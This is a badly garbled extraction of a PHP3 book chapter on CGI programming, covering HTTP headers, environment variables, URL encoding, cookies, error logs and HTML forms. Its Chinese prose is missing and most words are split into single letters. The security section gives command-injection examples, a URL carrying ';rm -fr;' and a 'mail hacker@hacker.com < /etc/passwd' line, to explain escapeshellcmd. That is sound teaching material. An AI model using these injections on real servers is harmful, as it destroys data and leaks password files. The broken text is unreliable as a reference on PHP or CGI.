12 CGI C G I (Common Gateway Interface) We b P H P C G I H T M L H T T P H T M L We b H T T P We We b I n t e r n e t R F C h t t p : / / w w w. i e t f. o rg / P H P C G I C G A p a c h e C G I P H P P H A p a c h e H T M L C G I C G I We b C G I Commom Gateway Interface We b C G I C G I C G C G I C G 12.1 CGI Java Applet C G I J a v a C G I C G I Java Applet CG I We b H T M L J a v a
190 PHP3 I n t e r n e t C G I J a v a C G I J a v a h t t p :// w w w. n e t c h a r t s. c o mjava Applet H T M L 12.2 CGI J a v a S c r i p t C G I J a v a S c r i p t C G I J a v a S c r i p t C G I J a v a S c r i p t C G I J a v a S c r i p t 12.3 P H P L I B C G I 12.4 CGI C G I We b C G I C G L i n u x A p a c h e M y S Q L P H P We b C G I We b C G I C G I We b C G I 12.5 C G I C G I We b C G I U R L We b C G I We b t e s t. p h p 3 C G I U R L C G We b C G I C G I U R L C G I We b L i n u x
12 CGI 191 Apache We b / u s r / l o c a l / a p a c h e / c g i - b i n / t e s t. p h p 3 Windows 95 We b / w e b s i t e / c g i - s h l / t e s t. p h p 3 We b C G I We b C G I C G I U R L C G I HTML U R L C G I C G I C G / r o o t / d o c u m e n t PAT H _ I N F O C G I C G I Q U E RY _ S T R I N G C G I C G I 12. 7 C G I C G I U R L 12.6 HTTP C G I H T T P S S I 12-1 H T T P P H P h e a d e r H T T P header('content Type : text/html'); P H P echo"content Type : text/html\n\n"; H T T P H T T
192 PHP3 H T T P H T M L G I F Content Type : text/plain Content Type : text/html Content Type : image/gif C o o k e s Set-cookie :... Status : 402 Location : http://www. f o o b a r. c o m N e t s c a p e M I M E text/plain t e x t / h t m l t e x t / p l a i n t e x t / h t m l M I M E L o c a t i o n We b C G I 10 U R L echo " Location : $nextpage\n\n " ; L o c a t i o n C o o k i e s S e t - c o o k i e H T T P S t a t u s 12.7 CGI C G I We b I P We b We C G I
12 CGI 193 P H P C G I 12-2 A U T H _ T Y P E C O N T E N T _ L E N G T H C O N T E N T _ T Y P E D O C U M E N T _ R O O T G AT E WAY _ I N T E R FA C E H T T P _ A C C E P T H T T P _ U S E R _ A G E N T H T T P _ F R O M Q U E RY _ S T R I N G PAT H _ I N F O PAT H _ T R A N S L AT E D R E M O T E _ A D D R R E M O T E _ H O S T R E M O T E _ I D E N T R E M O T E _ U S E R R E Q U E S T _ M E T H O D S C R I P T _ N A M E S C R I P T _ F I L E N A M E S E RV E R _ N A M E S E RV E R _ P O RT S E RV E R _ P R O TO C O L S E RV E R _ S O F T WA R E We b P H P $ H T T P _ P O S T _ VA R S P O S T a p p l i c a t i o n / o c t e t - s t r e a m a p a c h e / u s r / l o c a l / a p a c h e / h t d o c s We b C G I C G I / 1. 1 M I M E i m a g e / g i f i m a g e / x - x b i t m a p i m a g e / j p e g i mage/ p j p e g image/png, / N e t s c a p t M o z i l l a e m a i l H T M L G E T C G I P H P $ H T T P _ G E T _ VA R S H T T P I P I D E N T D G E T P O S T C G I P H P $ H T T P _ G E T _ VA R S $ H T T P _ G E T _ VA R S P H P $ P H P _ S E L F We b 80 H T T P / 1. 0 We b w e b S i t e / 1. 1 e P H P $ P H P _ S E L F $ P H P _ S E L F $ P H P _ S E L g e t e n v $PHP_SELF = getenv( " PHP_SELF " );
194 PHP3 12.8 URL W W W H T T P David Medinets U R L 8 - b i t % Davy Jones <dj@mtolive.com > D a v y + J o n e s + % 3 C d j @ m t o l i v e. com% 3E < % 3 C > % 3 E 12.8.1 r a w u r l e n c o d e P H P r a w u r l e n c o d e U R L U R L r a w u r l e n c o d e I n t e r n e t r a w u r l e n c o d e H T M L 12.8.2 P H P U R L 1) a. h t m l 2) a. p h p 3 3) a. h t m l!aaa bbb<@bbbb!
12 CGI 195 12.9 We b C G I C G I PAT H _ I N F O C G I U R L http://www.foo.com/cgi-bin/dirlist.php3/docs PAT H _ I N F O d o c s l l s U R L http://www.foo.com/cgi-bin/dirlist.php3/;rm -fr; C G I m a i l s e n d m a i l g r e p P H P m a i l h a c k e r @ h a c k e r.com < /etc/passwd p a s s w o r d m a i l P H P e s c a p e s h e l l c m d e s c a p e s h e l l c m d 12.10 cookie H T T P I P C G I c o o k i e c o o k i e s H T T P H T T P c o o k i e We b c o o k i e c o o k i e
196 PHP3 12.10.1 cookie c o o k i e c o o k i We b 300 c o o k i e We b 20 c o o k i e c o o k i e 4 K B c o o k i e 1. 2 M c o o k i e c o o k i e c o o k i e. t x t N e t s c a p e c o o k i e c o o k i e c o o k i e c o o k i e s. t x t M a c i n t o s h c o o k i e M a g i c C o o k i e 12.10.2 c o o k i e s e t - c o o k i e H T T P c o o k i e H T T P 5 5 cookie-name=cookie-value; c o o k i e c o o k i e 4 K B expires=expiration-date; cookie cookie c o o k i e c o o k i e c o o k i e c o o k i e c o o k i e path=cookie-path; c o o k i e domain=server-domain; c o o k i e We b w w w c o o k i e. f o o. n e t w w w. f o o. n e t c o o k i e secure H T T P c o o k i e We b H T T P _ C O O K I E c o o k i e C G I c o o k i e c o o k i e P H P P H P H T T P _ C O O K I E $ H T T P _ C O O K I E _ VA R S P H P u s e r c o o k i e $ u s e r c o o k i e 12-1 c o o k i e u s e r i d c o o k i c o o k i e c o o k i
12 CGI 197 12-1 cookie.php3 s e t c o o k i e c o o k i e 12.10.3 c o o k i e c o o k i e c o o k i c o o k i e c o o k i e c o o k i e c o o k i 12-2 c o o k i e C G I c o o k i e T E S T I N G c o o k i e c o o k i e c o o k i e 12-2 test.php3 c o o k i e
198 PHP3 H T T P c o o k i e 12. 11 C G I C G I H T M L 5 00 H T T P H T T P 1 2. 11.1 P H P e r r o r _ l o g 12-3 e r r o r _ l o g 12-3 server log.php3 e r r o r _ l o g
12 CGI 199 This is line one. This is line two. / u s r / l o c a l / a p a c h e / h t d o c s / e r r o r _ l o g We b e r r o r _ l o g("php: GOOD Status\n") ; 12. 11.2 H T M L H T T P 12-4 12-1 e r r o r _ e x i t 12-1 e r r o r _ e x i t 12-4 error. p h p 3
200 PHP3 12.12 C G I H T M L H T M L 5 H T M L We b 12.12.1 HTML H T M L We b H T M L H T M L ( t a g ) < B > < / B > H T M L H T M L H T M < H E A D >... < / H E A D > H T M L < T I T L E > < / T I T L E > H T M L H T M L < T I T L E > < t i t l e > H T M L H T M L H T M L < B O D Y >... < B O D Y / > < H 1 > < / H 1 > H H 1 1 H 2 2 < P > < B R > < B > < / B > < I >... < / I > H T M L < H T M L > < H T M L / > < B O D Y >... < / B O D Y >
12 CGI 201 12.12.2 HTML H T M L ( ) < F O R M >... < F O R M / > H T M L < F O R M >... < F O R M / > M E T H O D A C T I O N METHOD C G I P O S T G E T A C T I O N U R L mail to ACTION= mail to medinet@mtolive.com ACTION= /cgi-bin/feedback.php3 C G I <I N P U T> <F O R M> <I N P U T> C H E C K E D NAME SIZE M A X L E N G T H M A X L E N G T S I Z E T Y P E c h e c k b o x h i d d e n p a s s w o r d r a d i o r e s e t s u b m i t t e x t VA L U E H T M L Wa s Wa l d o 50 25 25 p a s s w o r d <INPUT TYPE=password NAME=password SIZE=10> p a s s w o r d p a s s w o r o d < I N P U T >
202 PHP3 U R L C G I VA L U E <INPUT TYPE="submit" VALUE="Process Information"> H i d d e n C G I C G I C G I 5 < S E L E C T > C P U < S E L E C T >... < / S E L E C T > < S E L E C T >... < / S E L E C T >
12 CGI 203 S E L E C T E D 3 3 3 S E L E C T < T E X TA R E A >...</ T E X TA R E A > < T E X TA R E A > R O W S C O L S < T E X TA R E A >... < / T E X TA R E A > W R A P v i r t u a l <TEXTAREA NAME= comments ROWS= 3 COLS= 60 WRAP= virtual > W R A P W R A p h y s i c a l H T M L 12.12.3 P O S T G E T < F O R M > M E T H O D G E T <FORM METHOD= get ACTION= " /cgi-bin/gestbook.php3 > G E T U R L C G I U R L A C T I O N Q U E RY _ S T R I N G C G I G E T We b U R L G E T P O S T P O S T S T D I N C G I We b C O N T E N T _ L E N G T H C G I P H P C G I P H P $ H T T P _ G E T _ VA R S $ H T T P _ P O S T _ VA R S P H P a g e $ a g $ H T T P _ P O S T _ VA R S [ a g e ] P O S T 12.13 C G I C G I We b C G I Java Applet C G I U R L U R L H T M L
204 PHP3 C G I H T T P C o n t e n t - t y p e H T M L L o c a t i o n U R L S e t _ c o o k i e S t a t u s U R L C G I PAT H _ I N F O Q U E RY _ S T R I N G P H P P H P $ H T T P _ P O S T _ VA R S $ H T T P _ G E T _ VA R S C G I We b R E M O T E _ A D D R I P S C R I P T _ N A M E U R L < % 3 C m a i l g r e p We b C o o k i e s P H P e r r o r _ l o g H T M L H T M L < P > < H >... < / H > H T M L < H T M L >... < H T M L / > < H T M L >... < H T M L / > < H E A D >... < H E A D / > < B O D Y >... < B O D Y / > H T M L H T M L < F O R M >... < / F O R M > A C T I O N We b C G I U R L M E T H O D C G I G E T $ H T T P _ G E T _ VA R S P O S T $ H T T P _ P O S T _ VA R S